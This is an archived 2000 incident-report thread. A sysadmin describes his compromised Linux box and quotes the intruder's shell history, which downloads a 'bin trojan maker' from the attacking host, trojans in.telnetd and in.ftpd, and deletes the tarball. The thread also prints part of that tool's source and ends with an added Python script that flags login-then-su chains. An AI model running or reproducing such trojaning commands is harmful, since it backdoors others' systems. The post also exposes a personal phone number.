Security Incidents mailing list archives

Re: succesful crack


From: icon94 () HOTMAIL COM (icon xxeti)
Date: Thu, 17 Feb 2000 22:09:03 GMT


Welcome to the club.
Some sort of trend going on here

From: Bob Lockie <bjlockie () NORTELNETWORKS COM>
Reply-To: Bob Lockie <bjlockie () nortelnetworks com>
To: INCIDENTS () SECURITYFOCUS COM
Subject: succesful crack
Date: Tue, 15 Feb 2000 14:59:24 -0500

rjlockie () home net

(613) 765-5409


My box (24.112.89.219) was cracked.

The attack originated from  24.11.98.152 (c505000-a.blfld1.ct.home.com).

It could be this machine was also cracked and it was used as a launching
point.
Please contact the owner and have a talk with them.
The owner should definitely not offer anonymous ftp service.

A few things were left on my system.

drwxr-xr-x   2 root     root         1024 Feb 13 22:03 ADMROCKS

I have no /etc/host.allow or /etc/hosts.deny files anymore.

This was in /tmp/,bash_history.

ftp 24.11.98.152
tar -xvf btm.tar
make
./btm /usr/sbin/in.telnetd
./btm /usr/sbin/in.ftpd
rm -rf btm.tar

The following source:

/* bin trojan maker */

#include "btm.h"

#define BTM_VER "btm v1.5"


int options=0;

void usage(char* progname)
{
  printf("usage: %s [-d] [-D define line] [-c] [-l max] [-v] [-u compiler]"
         " [-o compiler options] target [trojan source]\n",progname);
  printf("in trojan source, the trojan function must be:\n");
  printf("  "TROJAN_FCT"(char** argv,char** envp)\n");
  printf("\n");
  printf("-d: debug mode\n");
  printf("-c: don't trojan, just put the C file on stdout\n");
  printf("-l max: max number of char in a line of the C file\n");
  printf("-v: display version\n");
  printf("-u compiler: use this compiler\n");
  printf("-o options: options for compiler\n");
  printf("-n: no save for target file\n");
  printf("-e: echo commands\n");
  printf("-m comments: put comments in btmized file\n");
  printf("\n");
  exit(0);
}


int getdirname(char* dirname,char* filename,size_t dirname_size)
{

  if (!filename) return -1;

  if (filename[0]=='/') {
    strncpy(dirname,filename,dirname_size);
    *(((char*)strrchr(dirname,'/'))+1)=0;
  }
  else {
    if (!getcwd(dirname,dirname_size)) {
      perror("getcwd");
      return -1;
    }
  }

  return 0;
}


/var/log/secure
Feb 14 01:04:23 gw PAM_pwdb[6868]: (login) session opened for user tek by (uid=0)
Feb 14 01:04:25 gw PAM_pwdb[6883]: (su) session opened for user own by tek(uid=5000)



Bob Lockie
bjlockie () nortelnetworks com

Live long and prosper.

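The /var/log/secure excerpt above shows the sequence that deserves an alert: a login session for one user followed within seconds by an su session to a different user. The following is an added example, not code from the original report or from any of the posters: it parses PAM_pwdb "session opened" syslog lines and pairs each su with the most recent login of the user who ran it inside a short window. The sample lines are constructed from the two in the report (with one unrelated ftpd line added); the host name and window length are assumptions.

```python
import re
from datetime import datetime, timedelta

# Syslog line shape as produced by PAM_pwdb in the report's excerpt:
#   <Mon DD HH:MM:SS> <host> PAM_pwdb[<pid>]: (<service>) session opened for user <u> by <by>(uid=<n>)
PAM_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) PAM_pwdb\[(?P<pid>\d+)\]: "
    r"\((?P<service>\w+)\) session opened for user (?P<user>\S+) by (?P<by>\w*)\(uid=(?P<uid>\d+)\)$"
)

def parse_pam_line(line):
    """Return a dict for a PAM_pwdb 'session opened' line, or None for any other line."""
    m = PAM_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    # syslog timestamps carry no year; strptime defaults to 1900, which is fine for intra-log deltas
    d["ts"] = datetime.strptime(d["ts"], "%b %d %H:%M:%S")
    d["pid"] = int(d["pid"])
    d["uid"] = int(d["uid"])
    return d

def find_login_su_chains(lines, window=timedelta(minutes=5)):
    """Pair each (su) session with the latest (login) of the user who ran su, within the window."""
    events = [e for e in map(parse_pam_line, lines) if e]
    chains = []
    for su in (e for e in events if e["service"] == "su"):
        logins = [e for e in events
                  if e["service"] == "login" and e["user"] == su["by"]
                  and timedelta(0) <= su["ts"] - e["ts"] <= window]
        if logins:
            login = max(logins, key=lambda e: e["ts"])
            chains.append({"login_user": su["by"], "su_target": su["user"],
                           "delay_s": int((su["ts"] - login["ts"]).total_seconds()),
                           "su_pid": su["pid"]})
    return chains

# Constructed sample: the two lines from the report, rejoined, plus an unrelated line.
SAMPLE_LOG = [
    "Feb 14 01:04:23 gw PAM_pwdb[6868]: (login) session opened for user tek by (uid=0)",
    "Feb 14 01:04:25 gw PAM_pwdb[6883]: (su) session opened for user own by tek(uid=5000)",
    "Feb 14 01:09:00 gw in.ftpd[6890]: connect from 192.0.2.10",
]

if __name__ == "__main__":
    for c in find_login_su_chains(SAMPLE_LOG):
        print(f"login as {c['login_user']} -> su to {c['su_target']} "
              f"after {c['delay_s']}s (su pid {c['su_pid']})")
```

Run against the real file, the same routine also surfaces su chains to accounts that should never be a target, such as the "own" account seen here.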

